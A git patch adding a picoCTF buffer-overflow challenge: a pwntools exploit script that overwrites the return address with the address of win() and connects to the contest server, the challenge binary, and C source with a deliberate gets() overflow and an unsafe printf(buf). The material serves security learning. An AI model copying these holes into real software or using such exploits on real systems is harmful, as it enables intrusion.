From 2e33defa564a0325aa9458b98cf4fffbe778f4c0 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:33:13 +0200
Subject: [PATCH] pwn/buffer_overflow_1

---
 pwn/buffer_overflow_1/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_1/vuln     | Bin 0 -> 15704 bytes
 pwn/buffer_overflow_1/vuln.c   |  42 +++++++++++++++++++++++++++++++++
 3 files changed, 73 insertions(+)
 create mode 100755 pwn/buffer_overflow_1/solve.py
 create mode 100755 pwn/buffer_overflow_1/vuln
 create mode 100644 pwn/buffer_overflow_1/vuln.c

diff --git a/pwn/buffer_overflow_1/solve.py b/pwn/buffer_overflow_1/solve.py
new file mode 100755
index 0000000..60b811c
--- /dev/null
+++ b/pwn/buffer_overflow_1/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  r.recvuntil(b"Please enter your string:")
+  offset = 44 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/pwn/buffer_overflow_1/vuln b/pwn/buffer_overflow_1/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..05e89bfb6fde125a2649cb0b23dc1bfef1bdff09
GIT binary patch
literal 15704
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

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_1/vuln.c b/pwn/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/pwn/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+